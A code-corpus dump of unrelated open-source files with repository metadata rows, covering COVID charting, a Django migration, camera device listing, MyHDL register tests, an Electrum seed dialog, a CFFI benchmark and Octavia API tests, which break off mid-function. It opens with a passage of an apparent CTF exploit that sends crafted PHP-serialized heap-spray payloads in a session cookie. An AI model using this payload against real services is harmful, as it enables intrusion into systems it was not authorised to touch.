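# The helpers above emit PHP-style serialized values, e.g.:
#   s_array(s_str("a"), s_int(1)) -> 'a:1:{s:1:"a";i:1;}'
#   s_bool(True) -> 'b:1;', s_ref(2) -> 'r:2;', s_null() -> 'N;'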
host = "10.13.37.8"
host = "localhost"
r = remote(host, 47793)
def send_payload(r, path, payload):
http_payload = "GET %s HTTP/1.1\r\n" % path
http_payload += "Host: z\r\n"
http_payload += "Connection: keep-alive\r\n"
http_payload += "Cookie: session=%s\r\n" % b64encode(payload)
http_payload += "\r\n"
r.send(http_payload)
result = ''
try:
t = r.recv(timeout=0.5)
while t != '':
result += t
t = r.recv(timeout=0.5)
except EOFError:
pass
return result
spray = s_array(
*[s_int(0x01010101 * i) for i in range(32)]
)
print send_payload(r, "/info", spray)
payload = s_array(
s_str("aaaa"), s_ref(4),
s_str("bbbb"), s_int(0x70),
s_ref(2), s_str("cccc")
)
print send_payload(r, "/info", payload)
| gpl-2.0 | -9,006,028,544,528,207,000 | 15.835616 | 65 | 0.506144 | false | 2.752643 | false | false | false |

| jhanley634/testing-tools | problem/covid/sd_cases_deaths.py | 1 | 2150 |
#! /usr/bin/env streamlit run
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
import datetime as dt
from altair import datum
from covid.us_cases_deaths import delta, get_cases_and_deaths, get_chart, smooth
import altair as alt
import streamlit as st
def _get_annotation(df):
# https://en.wikipedia.org/wiki/Sturgis_Motorcycle_Rally
rally = 1e3 * dt.datetime.strptime('2020-08-07', '%Y-%m-%d').timestamp()
ten_days = 10 * 1e3 * 86400
annotation = alt.Chart(df).mark_text(
align='left',
baseline='middle',
fontSize=20,
dx=7
).encode(
x='date',
y='val',
text='label'
).transform_filter(
(rally <= datum.date) & (datum.date < rally + ten_days)
)
return annotation
def main():
df = get_cases_and_deaths('us-states.csv', 'South Dakota')
df['label'] = '.'
st.altair_chart(get_chart(df) + _get_annotation(df))
st.altair_chart(get_chart(df, 'log') + _get_annotation(df))
delta(df)
smooth(df, span=7)
st.altair_chart(get_chart(df) + _get_annotation(df))
if __name__ == '__main__':
main()
| mit | -4,698,819,997,443,697,000 | 35.440678 | 80 | 0.695349 | false | 3.536184 | false | false | false |

| spreeker/democracygame | democracy/issue/migrations/0002_auto__add_field_issue_slug.py | 1 | 4992 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Issue.slug'
db.add_column('issue_issue', 'slug', self.gf('django.db.models.fields.SlugField')(max_length=80, null=True, db_index=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Issue.slug'
db.delete_column('issue_issue', 'slug')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'issue.issue': {
'Meta': {'object_name': 'Issue'},
'body': ('django.db.models.fields.TextField', [], {'max_length': '2000'}),
'hotness': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'offensiveness': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '80', 'null': 'True', 'db_index': 'True'}),
'source_type': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2010, 9, 16, 14, 17, 28, 118475)'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['issue']
| bsd-3-clause | -6,876,075,056,248,061,000 | 64.684211 | 182 | 0.553085 | false | 3.692308 | false | false | false |

| TheImagingSource/tiscamera | examples/python/00-list-devices.py | 1 | 2576 |
#!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
"""
Print information about all available devices
"""
sample_pipeline = Gst.parse_launch("tcambin name=source ! fakesink")
if not sample_pipeline:
print("Unable to create pipeline")
sys.exit(1)
source = sample_pipeline.get_by_name("source")
serials = source.get_device_serials_backend()
for single_serial in serials:
# This returns something like:
# (True,
# name='DFK Z12GP031',
# identifier='The Imaging Source Europe GmbH-11410533',
# connection_type='aravis')
# The identifier is the name given by the backend
# The connection_type identifies the backend that is used.
# Currently 'aravis', 'v4l2', 'libusb' and 'unknown' exist
(return_value, model,
identifier, connection_type) = source.get_device_info(single_serial)
# return value would be False when a non-existent serial is used
# since we are iterating get_device_serials this should not happen
if return_value:
print("Model: {} Serial: {} Type: {}".format(model,
single_serial,
connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
# this line sets the gstreamer default logging level
# it can be removed in normal applications
# gstreamer logging can contain very useful information
# when debugging your application
# see https://gstreamer.freedesktop.org/documentation/tutorials/basic/debugging-tools.html
# for further details
Gst.debug_set_default_threshold(Gst.DebugLevel.WARNING)
list_devices()
| apache-2.0 | -4,272,001,744,929,887,700 | 31.607595 | 94 | 0.660326 | false | 4.043956 | false | false | false |

| cfelton/minnesota | test/test_system/test_regfile.py | 1 | 7464 |
#
# Copyright (c) 2006-2013 Christopher L. Felton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import collections
from random import randint
import traceback
from myhdl import *
from mn.system import Clock
from mn.system import Reset
from mn.system import Global
from mn.system import RegisterFile
from mn.system import Register
from mn.system import Wishbone
from mn.utils.test import *
regdef = None
regfile = None
def _create_mask(n):
m = 1
for _ in xrange(n):
m = (m << 1) | 1
return m
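# e.g. _create_mask(3) == 0b1111 == 15 (n iterations leave n+1 low bits set)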
def _create_test_regfile():
global regdef
regdef = collections.OrderedDict()
# --register 0--
reg = Register('control', 0x0018, 8, 'rw', 0)
reg.comment = "register 0"
reg.add_named_bits('enable', slice(1, 0)) # read-only namedbit
reg.add_named_bits('loop', slice(2, 1)) # read-only namedbit
regdef[reg.name] = reg
# -- more registers --
for addr,default in zip((0x20, 0x40, 0x80),
(0xDE, 0xCA, 0xFB)):
reg = Register('reg%s' % (addr,), addr, 8, 'rw', default)
regdef[reg.name] = reg
# -- read only register --
reg = Register('regro', 0x100, 8, 'ro', 0xAA)
regdef[reg.name] = reg
# another read only register, with named bits
reg = Register('status', 0x200, 8, 'ro', 0)
reg.add_named_bits('error', slice(1, 0)) # bit 0, read-write namedbit
reg.add_named_bits('ok', slice(2, 1)) # bit 1, read-write namedbit
reg.add_named_bits('cnt', slice(8, 2)) # bits 7-2, read-write namedbit
regdef[reg.name] = reg
regfile = RegisterFile(regdef)
return regfile
def m_per_top(clock, reset, mon):
glbl = Global(clock, reset)
wb = Wishbone(glbl)
#gpm = wb.m_controller(wb)
gp1 = m_per(glbl, wb, mon)
return gp1
def m_per(glbl, regbus, mon):
global regfile
regfile = _create_test_regfile()
g_regfile = regbus.m_per_interface(glbl, regfile)
clock, reset = glbl.clock, glbl.reset
## all "read-only" (status) bits if needed
@always_seq(clock.posedge, reset=reset)
def rtl_roregs():
if regfile.regro.rd:
regfile.regro.next = mon
return g_regfile #, rtl_roregs
def m_per_bits(glbl, regbus, mon):
global regfile
regfile = _create_test_regfile()
g_regfile = regbus.m_per_interface(glbl, regfile)
count = modbv(0, min=0, max=1)
clock, reset = glbl.clock, glbl.reset
## all "read-only" (status) bits if needed
@always(clock.posedge)
def rtl_roregs():
count[:] = count + 1
# only 'ro' registers can have named bits that can
# be set
if count:
regfile.error.next = True
regfile.ok.next = False
else:
regfile.error.next = False
regfile.ok.next = True
if regfile.regro.rd:
regfile.regro.next = mon
regfile.cnt.next = count[5:]
return g_regfile, rtl_roregs
def test_register_def():
regfile = _create_test_regfile()
assert len(regfile._rwregs) == 4
assert len(regfile._roregs) == 2
def test_register_file():
global regfile
# top-level signals and interfaces
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=1, async=False)
glbl = Global(clock, reset)
regbus = Wishbone(glbl)
def _test_rf():
tb_dut = m_per(glbl, regbus, 0xAA)
tb_or = regbus.m_per_outputs()
tb_mclk = clock.gen()
tb_rclk = regbus.clk_i.gen()
asserr = Signal(bool(0))
@instance
def tb_stim():
try:
yield delay(100)
yield reset.pulse(111)
for k,reg in regdef.iteritems():
if reg.access == 'ro':
yield regbus.read(reg.addr)
rval = regbus.readval
assert rval == reg.default, "ro: %02x != %02x" % (rval, reg.default)
else:
wval = randint(0,(2**reg.width)-1)
yield regbus.write(reg.addr, wval)
for _ in xrange(4):
yield clock.posedge
yield regbus.read(reg.addr)
rval = regbus.readval
assert rval == wval, "rw: %02x != %02x" % (rval, wval)
yield delay(100)
except AssertionError,err:
print("@E: %s" % (err,))
traceback.print_exc()
asserr.next = True
for _ in xrange(10):
yield clock.posedge
raise err
raise StopSimulation
return tb_mclk, tb_stim, tb_dut, tb_or, tb_rclk
vcd = tb_clean_vcd('_test_rf')
traceSignals.name = vcd
g = traceSignals(_test_rf)
Simulation(g).run()
def test_register_file_bits():
global regfile
# top-level signals and interfaces
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=1, async=False)
glbl = Global(clock, reset)
regbus = Wishbone(glbl)
def _test():
tb_dut = m_per_bits(glbl, regbus, 0xAA)
tb_or = regbus.m_per_outputs()
tb_mclk = clock.gen()
tb_rclk = regbus.clk_i.gen()
asserr = Signal(bool(0))
@instance
def tb_stim():
regfile.ok.next = True
try:
yield reset.pulse(111)
yield clock.posedge
yield clock.posedge
truefalse = True
yield regbus.write(regfile.control.addr, 0x01)
for _ in xrange(100):
assert (regfile.enable, regfile.loop) == (truefalse, not truefalse)
yield regbus.read(regfile.control.addr)
yield regbus.write(regfile.control.addr,
~regbus.readval)
truefalse = not truefalse
yield clock.posedge
except AssertionError, err:
asserr.next = True
for _ in xrange(20):
yield clock.posedge
raise err
raise StopSimulation
return tb_mclk, tb_stim, tb_dut, tb_or, tb_rclk
vcd = tb_clean_vcd('_test')
traceSignals.name = vcd
g = traceSignals(_test)
Simulation(g).run()
def test_convert():
clock = Signal(bool(0))
reset = ResetSignal(0, active=0, async=True)
mon = Signal(intbv(0)[8:])
toVerilog(m_per_top, clock, reset, mon)
toVHDL(m_per_top, clock, reset, mon)
if __name__ == '__main__':
#parser = tb_arparser()
#args = parser.parse_args()
test_register_def()
test_register_file()
test_register_file_bits()
test_convert()
| gpl-3.0 | 6,406,166,799,250,013,000 | 28.975904 | 93 | 0.561763 | false | 3.507519 | true | false | false |

| BlackhatEspeed/electrum | gui/qt/seed_dialog.py | 1 | 3072 |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
from electrum.i18n import _
from electrum import mnemonic
from qrcodewidget import QRCodeWidget, QRDialog
from util import close_button
from qrtextedit import ShowQRTextEdit, ScanQRTextEdit
class SeedDialog(QDialog):
def __init__(self, parent, seed, imported_keys):
QDialog.__init__(self, parent)
self.setModal(1)
self.setMinimumWidth(400)
self.setWindowTitle('Electrum' + ' - ' + _('Seed'))
vbox = show_seed_box_msg(seed)
if imported_keys:
vbox.addWidget(QLabel("<b>"+_("WARNING")+":</b> " + _("Your wallet contains imported keys. These keys cannot be recovered from seed.") + "</b><p>"))
vbox.addLayout(close_button(self))
self.setLayout(vbox)
def icon_filename(sid):
if sid == 'cold':
return ":icons/cold_seed.png"
elif sid == 'hot':
return ":icons/hot_seed.png"
else:
return ":icons/seed.png"
def show_seed_box_msg(seedphrase, sid=None):
msg = _("Your wallet generation seed is") + ":"
vbox = show_seed_box(msg, seedphrase, sid)
save_msg = _("Please save these %d words on paper (order is important).")%len(seedphrase.split()) + " "
msg2 = save_msg + " " \
+ _("This seed will allow you to recover your wallet in case of computer failure.") + "<br/>" \
+ "<b>"+_("WARNING")+":</b> " + _("Never disclose your seed. Never type it on a website.") + "</b><p>"
label2 = QLabel(msg2)
label2.setWordWrap(True)
vbox.addWidget(label2)
vbox.addStretch(1)
return vbox
def show_seed_box(msg, seed, sid):
vbox, seed_e = enter_seed_box(msg, None, sid=sid, text=seed)
return vbox
def enter_seed_box(msg, window, sid=None, text=None):
vbox = QVBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_filename(sid)).scaledToWidth(56))
logo.setMaximumWidth(60)
label = QLabel(msg)
label.setWordWrap(True)
if not text:
seed_e = ScanQRTextEdit(win=window)
seed_e.setTabChangesFocus(True)
else:
seed_e = ShowQRTextEdit(text=text)
seed_e.setMaximumHeight(130)
vbox.addWidget(label)
grid = QGridLayout()
grid.addWidget(logo, 0, 0)
grid.addWidget(seed_e, 0, 1)
vbox.addLayout(grid)
return vbox, seed_e
| gpl-3.0 | 2,860,938,589,312,174,000 | 35.141176 | 160 | 0.66569 | false | 3.455568 | false | false | false |

| tleonhardt/CodingPlayground | python/cffi/fibonacci/test_cffi.py | 1 | 1755 |
#!/usr/bin/env python
""" Python wrapper to time the CFFI wrapper for computing the nth fibonacci number
in a non-recursive fashion and compare it to the pure Python implementation.
"""
import cffi
import fib_python
if __name__ == '__main__':
import sys
import timeit
n = 20
try:
n = int(sys.argv[1])
except Exception:
pass
number_of_times = 100000
try:
number_of_times = int(sys.argv[2])
except Exception:
pass
# The main top-level CFFI class that you instantiate once
ffi = cffi.FFI()
# Parses the given C source. This registers all declared functions.
ffi.cdef('int compute_fibonacci(int n);')
# Load and return a dynamic library. The standard C library can be loaded by passing None.
libfib = ffi.dlopen('./libfibonacci.so')
fib_py = fib_python.compute_fibonacci(n)
fib_cffi = libfib.compute_fibonacci(n)
if fib_py != fib_cffi:
raise(ValueError(fib_cffi))
py_tot = timeit.timeit("compute_fibonacci({})".format(n),
setup="from fib_python import compute_fibonacci",
number=number_of_times)
cffi_tot = timeit.timeit("libfib.compute_fibonacci({})".format(n),
setup="""import cffi; ffi = cffi.FFI(); ffi.cdef('int compute_fibonacci(int n);'); libfib = ffi.dlopen('./libfibonacci.so')""",
number=number_of_times)
py_avg = py_tot / number_of_times
cffi_avg = cffi_tot / number_of_times
print("fib({}) = {}".format(n, fib_py))
print("Python average time: {0:.2g}".format(py_avg))
print("CFFI/C average time: {0:.2g}".format(cffi_avg))
print("CFFI/C speedup: {0:.2g} times".format(py_avg/cffi_avg))
| mit | -701,642,183,918,904,800 | 34.1 | 154 | 0.612536 | false | 3.25 | false | false | false |

| openstack/octavia | octavia/tests/functional/api/v2/test_availability_zone_profiles.py | 1 | 29649 |
# Copyright 2019 Verizon Media
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_db import exception as odb_exceptions
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
class TestAvailabilityZoneProfiles(base.BaseAPITest):
root_tag = 'availability_zone_profile'
root_tag_list = 'availability_zone_profiles'
root_tag_links = 'availability_zone_profile_links'
def _assert_request_matches_response(self, req, resp, **optionals):
self.assertTrue(uuidutils.is_uuid_like(resp.get('id')))
self.assertEqual(req.get('name'), resp.get('name'))
self.assertEqual(req.get(constants.PROVIDER_NAME),
resp.get(constants.PROVIDER_NAME))
self.assertEqual(req.get(constants.AVAILABILITY_ZONE_DATA),
resp.get(constants.AVAILABILITY_ZONE_DATA))
def test_empty_list(self):
response = self.get(self.AZPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual([], api_list)
def test_create(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_with_missing_name(self):
az_json = {constants.PROVIDER_NAME: 'pr1',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute name. Value: "
"'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_provider(self):
az_json = {'name': 'xyz',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute provider_name. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_availability_zone_data(self):
az_json = {'name': 'xyz', constants.PROVIDER_NAME: 'pr1'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute availability_zone_data. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_empty_availability_zone_data(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_with_long_name(self):
az_json = {'name': 'n' * 256, constants.PROVIDER_NAME: 'test1',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_with_long_provider(self):
az_json = {'name': 'name1', constants.PROVIDER_NAME: 'n' * 256,
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_with_long_availability_zone_data(self):
az_json = {'name': 'name1', constants.PROVIDER_NAME: 'amp',
constants.AVAILABILITY_ZONE_DATA: 'n' * 4097}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_authorized(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.post(self.AZPS_PATH, body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_not_authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
az_json = {'name': 'name',
constants.PROVIDER_NAME: 'xyz',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=403)
api_azp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_azp)
def test_create_db_failure(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
with mock.patch(
"octavia.db.repositories.AvailabilityZoneProfileRepository."
"create") as mock_create:
mock_create.side_effect = Exception
self.post(self.AZPS_PATH, body, status=500)
mock_create.side_effect = odb_exceptions.DBDuplicateEntry
self.post(self.AZPS_PATH, body, status=409)
def test_create_with_invalid_json(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{hello: "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_get(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
response = self.get(
self.AZP_PATH.format(
azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('name', response.get('name'))
self.assertEqual(azp.get('id'), response.get('id'))
def test_get_one_deleted_id(self):
response = self.get(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_get_one_fields_filter(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id')), params={
'fields': ['id', constants.PROVIDER_NAME]}
).json.get(self.root_tag)
self.assertEqual(azp.get('id'), response.get('id'))
self.assertIn(u'id', response)
self.assertIn(constants.PROVIDER_NAME, response)
self.assertNotIn(u'name', response)
self.assertNotIn(constants.AVAILABILITY_ZONE_DATA, response)
def test_get_authorized(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(
self.AZP_PATH.format(
azp_id=azp.get('id'))).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual('name', response.get('name'))
self.assertEqual(azp.get('id'), response.get('id'))
def test_get_not_authorized(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.AZP_PATH.format(azp_id=azp.get('id')), status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_all(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
ref_fp_1 = {u'availability_zone_data': u'{"compute_zone": "my_az_1"}',
u'id': fp1.get('id'), u'name': u'test1',
constants.PROVIDER_NAME: u'noop_driver'}
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
ref_fp_2 = {u'availability_zone_data': u'{"compute_zone": "my_az_1"}',
u'id': fp2.get('id'), u'name': u'test2',
constants.PROVIDER_NAME: u'noop_driver-alt'}
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.AZPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
self.assertIn(ref_fp_1, api_list)
self.assertIn(ref_fp_2, api_list)
def test_get_all_fields_filter(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.AZPS_PATH, params={
'fields': ['id', 'name']})
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
for profile in api_list:
self.assertIn(u'id', profile)
self.assertIn(u'name', profile)
self.assertNotIn(constants.PROVIDER_NAME, profile)
self.assertNotIn(constants.AVAILABILITY_ZONE_DATA, profile)
def test_get_all_authorized(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
